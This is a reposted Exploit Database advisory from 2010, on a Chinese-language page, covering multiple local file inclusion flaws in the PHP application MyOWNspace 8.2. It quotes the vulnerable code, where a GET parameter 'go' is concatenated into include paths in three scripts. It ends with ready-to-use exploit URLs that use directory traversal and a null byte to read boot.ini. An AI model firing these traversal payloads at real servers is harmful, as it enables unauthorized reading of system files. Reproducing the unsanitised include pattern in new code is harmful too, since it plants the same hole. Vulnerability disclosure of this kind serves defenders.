MyOWNspace 8.2 – Multiple Local File Inclusions

• Exploit Database
• 127 阅读

• 作者： ITSecTeam
  日期： 2010-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11902/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

  =========================================================================== ( #Topic: MyOWNspace_v8.2 ( #Bug type : multi local file include ( #Download : http://sourceforge.net/project/platformdownload.php?group_id=174729 ( #Advisory :   =========================================================================== ( #Author : ItSecTeam ( #Email: Bug@ITSecTeam.com ( #Website: http://www.itsecteam.com ( #Forum: http://forum.ITSecTeam.com ( #discovered by : ahmadbady   vuls:=================================================================== path/graph.php   if (isset($_GET['go'])) {$go=$_GET['go']; line 28   $i=$go; line 30 . . . $friends="myownfriends/friends.".$i.".php";line 38 include $friends;line 39 . . . . . $friends="myownfriends/friends.".$i.".php"; line 74 include $friends; line 75 --------------------------------------------------------------------------- path/myowngraph.phperor graph.php line 39;   if (isset($_GET['go'])) {$go=$_GET['go']; line 28   $i=$go;line 29   include $friends; line 39 --------------------------------------------------------------------------- path/showmyownfriends.php   $conf_file="myownfriends/friends.".$_GET['go'].".php"; line 3   include $conf_file;line 17 --------------------------------------------------------------------------- exploit:===================================================================   path/graph.php?go=../../../../../../../boot.ini%00 path/myowngraph.php?go=../../../../../../../boot.ini%00 path/showmyownfriends.php?go=../../../../../../../boot.ini%00 ---------------------------------------------------------------------------